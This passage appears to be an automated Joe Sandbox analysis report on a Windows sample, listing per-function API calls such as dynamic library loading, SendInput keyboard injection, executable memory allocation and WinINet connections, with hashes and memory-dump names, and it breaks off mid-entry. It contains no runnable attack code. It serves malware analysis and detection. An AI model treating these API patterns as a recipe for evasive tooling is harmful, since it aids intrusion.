LoadLibraryA.KERNEL32(oleaut32.dll,?,006D135F,?,006D1440), ref: 006D1389
GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 006D139B

Strings

oleaut32.dll, xrefs: 006D1384
RegisterTypeLibForUser, xrefs: 006D1395

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1071820185
Opcode ID: 68ac982528333a3abd0f9f307bcb17487d4d3760693d7a84e595abc1e4776468
Instruction ID: a40c0bfdfe661678843ad040c7c4fdb4f36008b97c83f6d896dbe64abb5e23ac
Opcode Fuzzy Hash: 68ac982528333a3abd0f9f307bcb17487d4d3760693d7a84e595abc1e4776468
Instruction Fuzzy Hash: 51D05E70C00322AEDB300B28E808AC136D6AF04304B06841AA489917A0D7B8C8809A14

Function 006D13A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(oleaut32.dll,00000000,006D1371,?,006D1519), ref: 006D13B4
GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 006D13C6

Strings

UnRegisterTypeLibForUser, xrefs: 006D13C0
oleaut32.dll, xrefs: 006D13AF

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: UnRegisterTypeLibForUser$oleaut32.dll
API String ID: 2574300362-1587604923
Opcode ID: c3a25c2c612d280c110cfd2d1e436527034cd4daedd676cc915d86b73bd5e210
Instruction ID: 382a38ad74da9e5bb66b04ae9490b77170dbb2b49276f5827d34030f3082e316
Opcode Fuzzy Hash: c3a25c2c612d280c110cfd2d1e436527034cd4daedd676cc915d86b73bd5e210
Instruction Fuzzy Hash: 17D0A9B0800322BFD7344F28E808A8237EBAB40304F02C42AE499D27A0DBB8CC808B10

Function 006F3ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,006F3AC2,?,006F3CF7), ref: 006F3ADA
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 006F3AEC

Strings

RegDeleteKeyExW, xrefs: 006F3AE6
advapi32.dll, xrefs: 006F3AD5

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 741e74e858be5c21b946c1623da328a86958407c86efc6055d27243eac9aa2f7
Instruction ID: 0dd27e017cd3d4c8baf18daa6017d811efa00a9ca5d1953bb6bde550df290058
Opcode Fuzzy Hash: 741e74e858be5c21b946c1623da328a86958407c86efc6055d27243eac9aa2f7
Instruction Fuzzy Hash: 76D05E704403279ED7208B35A80E69136D6AB11304B018419E59591390EBB8C8809B14

Function 0069AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,006E6AA6), ref: 0069AB2D
_wcscmp.LIBCMT ref: 0069AB49

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: BuffCharUpper_wcscmp
String ID:
API String ID: 820872866-0
Opcode ID: 0d44cf6fbc361d871b68755d16e9ed62ca1d756af9e7fedac7fa8c864802d298
Instruction ID: ac3d5307633e662a9b4f3798d76a26d78296980030a21d6224a2ef01e8f5e2af
Opcode Fuzzy Hash: 0d44cf6fbc361d871b68755d16e9ed62ca1d756af9e7fedac7fa8c864802d298
Instruction Fuzzy Hash: 47A1027070010ADBDF15EFA4E9816ADB7FAFF44310F64816AE906C7A90EB349871D786

Function 006F0D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 006F0D85
CharLowerBuffW.USER32(?,?), ref: 006F0DC8

Part of subcall function 006F0458: CharLowerBuffW.USER32(?,?,?,?), ref: 006F0478

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 006F0FB2
_memmove.LIBCMT ref: 006F0FC2

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: d6e9ac79818a507061290ee9279152986c2f49d17ddfd911bf2aa9892fcbb3eb
Instruction ID: 4fc3cee1004666a5d068e3e77c0d88456d114cfd840f3ac251f657c541470279
Opcode Fuzzy Hash: d6e9ac79818a507061290ee9279152986c2f49d17ddfd911bf2aa9892fcbb3eb
Instruction Fuzzy Hash: 1EB17D71604304CFC754DF28C88096ABBE6EF89714F14886EF9899B352DB31ED46CB92

Function 006EAF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 006EAF56
CoUninitialize.COMBASE ref: 006EAF61

Part of subcall function 006D1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 006D10B8

VariantInit.OLEAUT32(?), ref: 006EAF6C
VariantClear.OLEAUT32(?), ref: 006EB23F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 6373aa26ce63674369160ae69e2e258e1e0b963641fb12de3a08ede362738f78
Instruction ID: 8ca62e1eeff92814f17ad629d683c09fa99915f37cfdd41e6ba5fcc4852ccb24
Opcode Fuzzy Hash: 6373aa26ce63674369160ae69e2e258e1e0b963641fb12de3a08ede362738f78
Instruction Fuzzy Hash: 45A168356047419FCB50DF15C891B6AB7E6BF89320F04845DFA9AAB3A1DB30ED44CB86

Function 006B42EB Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 006B4347
_memcpy_s.LIBCMT ref: 006B43B9
__filbuf.LIBCMT ref: 006B443A
_memset.LIBCMT ref: 006B447E

Part of subcall function 006B889E: __getptd_noexit.LIBCMT ref: 006B889E

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit_memcpy_s
String ID:
API String ID: 3877424927-0
Opcode ID: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
Instruction ID: 091249ac97c3d0f7585e417444b36cfe09eda3dec482f6d2395d30edf2113cfe
Opcode Fuzzy Hash: aebda769b95e77701e436127e080a9cadaa2a4c9016d62218a8c9d4b87048a89
Instruction Fuzzy Hash: B55183B0A002059BDB249F6A89806EE77E7EF41320F28876DF865963D2DF719DD19B40

Function 006FC2E7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 006FC354
ScreenToClient.USER32(?,00000002), ref: 006FC384
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 006FC3EA

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 588e74799a686f2e98b0e25a9d7a8525a81494fd0fda5e45e17930bd5887d491
Instruction ID: 633971ba7784b8524542f2823e674355d062f82d735d051714c37b5dcf17450c
Opcode Fuzzy Hash: 588e74799a686f2e98b0e25a9d7a8525a81494fd0fda5e45e17930bd5887d491
Instruction Fuzzy Hash: E0511971A0020DEFDF24DF68C980AFE7BB6BB45370F248559EA259B291D770AD41CB90

Function 006CD206 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 006CD258
__itow.LIBCMT ref: 006CD292

Part of subcall function 006CD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 006CD549

SendMessageW.USER32(?,0000110A,00000001,?), ref: 006CD2FB
__itow.LIBCMT ref: 006CD350

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 2b13ae5bbf4cd87c01cfc0e6a8b6615ef33a83e7b0f52d79267d07ad6d6ac60c
Instruction ID: aff3f83789f4a28b86511e18688871744faf7b12a01ca69d42c0f12451ab5f0b
Opcode Fuzzy Hash: 2b13ae5bbf4cd87c01cfc0e6a8b6615ef33a83e7b0f52d79267d07ad6d6ac60c
Instruction Fuzzy Hash: 3B418171A00209ABDF55EF54C852FFE7BBAEF49700F00402DFA05A3291DB749A45CB6A

Function 006DEE88 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 006DEF32
GetLastError.KERNEL32(?,00000000), ref: 006DEF58
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 006DEF7D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 006DEFA9

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: 03fa15cd53422441b6bed3a7dafe874548511e95ccee02f3366e9c7e7fe0261b
Instruction ID: 3ae9a251f158dd519aa19b6c4f2c77f344896a5d657d41732fe25d1d7de0fba5
Opcode Fuzzy Hash: 03fa15cd53422441b6bed3a7dafe874548511e95ccee02f3366e9c7e7fe0261b
Instruction Fuzzy Hash: 06415B35A00611DFCF10EF19C584A49BBE6EF89720B19C099E845AF762CB34FC00CB95

Function 006FB354 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 006FB3E1

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 59aa054ddc8a5ca054f390063608ab4c65248b90bc6fa2a20bcb526c18e08764
Instruction ID: d1731244793c3d3e746ed2a2134436383d159d0a5a6ff66f066796c458a7ca95
Opcode Fuzzy Hash: 59aa054ddc8a5ca054f390063608ab4c65248b90bc6fa2a20bcb526c18e08764
Instruction Fuzzy Hash: 32311E3164020CFBEF308E18CE85BF877A7AB06360F24A112FB01D62E6C770E8419B91

Function 006FD5EE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 006FD617
GetWindowRect.USER32(?,?), ref: 006FD68D
PtInRect.USER32(?,?,006FEB2C), ref: 006FD69D
MessageBeep.USER32(00000000), ref: 006FD70E

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 8c478da45215cbe38b0b33ae3cbabb025197b71ccd12cb354d6f023e334d7532
Instruction ID: c1580a1d64f4cc7b779b6a41aec7b5625360b36bbc158eec83157fb5f5c22b04
Opcode Fuzzy Hash: 8c478da45215cbe38b0b33ae3cbabb025197b71ccd12cb354d6f023e334d7532
Instruction Fuzzy Hash: A3413630A00218DFCB21DF58D884BE9BBF7BB49351F2881AAE609DB391D735B941CB54

Function 006D4497 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,7707C0D0,?,00008000), ref: 006D44EE
SetKeyboardState.USER32(00000080,?,00008000), ref: 006D450A
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 006D456A
SendInput.USER32(00000001,?,0000001C,7707C0D0,?,00008000), ref: 006D45C8

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 7eac44928c3a03b8435d3af458219d2c8fd13c791280845e80fc07e185f6d62f
Instruction ID: f85f938de2e3b09b57bdc66e3bef6d6340c3e768bd36e187a21ad6056138bd3f
Opcode Fuzzy Hash: 7eac44928c3a03b8435d3af458219d2c8fd13c791280845e80fc07e185f6d62f
Instruction Fuzzy Hash: 6A31E7B1D04298AFEF308B64A8187FE7BA79B49314F04425BF481923C1CF749E55DB66

Function 006C4DB4 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006C4DE8
__isleadbyte_l.LIBCMT ref: 006C4E16
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 006C4E44
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 006C4E7A

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 0f4d9141a78cf15d6c3b3e2b5afd1ea22df5e91b035a626421381a1be3a40d83
Instruction ID: af88d6c547efc0fc8edb1db4d0d2092e49a6064af74fd0fca9cc715a3d519d4d
Opcode Fuzzy Hash: 0f4d9141a78cf15d6c3b3e2b5afd1ea22df5e91b035a626421381a1be3a40d83
Instruction Fuzzy Hash: 46317C31600256ABDF21DE64C855FFA7BA6FF45310F16852DE821872A0EB31EC91DB90

Function 006F7AA2 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 006F7AB6

Part of subcall function 006D69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 006D69E3
Part of subcall function 006D69C9: GetCurrentThreadId.KERNEL32 ref: 006D69EA
Part of subcall function 006D69C9: AttachThreadInput.USER32(00000000,?,006D8127), ref: 006D69F1

GetCaretPos.USER32(?), ref: 006F7AC7
ClientToScreen.USER32(00000000,?), ref: 006F7B00
GetForegroundWindow.USER32 ref: 006F7B06

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: cc57304da4615eedcc2408941b16a00ef1f526ac3b24de54a4a40645ca179d0c
Instruction ID: 6f52b44919808256126152c711f065852bd950ad1174281c6c24068f13af724e
Opcode Fuzzy Hash: cc57304da4615eedcc2408941b16a00ef1f526ac3b24de54a4a40645ca179d0c
Instruction Fuzzy Hash: F6313E71D00109AFCB40EFB9D8918EFBBFAEF59310B10806AF815E7211E6349E058FA4

Function 006E497B Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006E49B7

Part of subcall function 006E4A41: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006E4A60
Part of subcall function 006E4A41: InternetCloseHandle.WININET(00000000), ref: 006E4AFD

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 2b63518085797411aa97c2cf1592821f7180e5bec554f88f1e083f8cee4e54ec
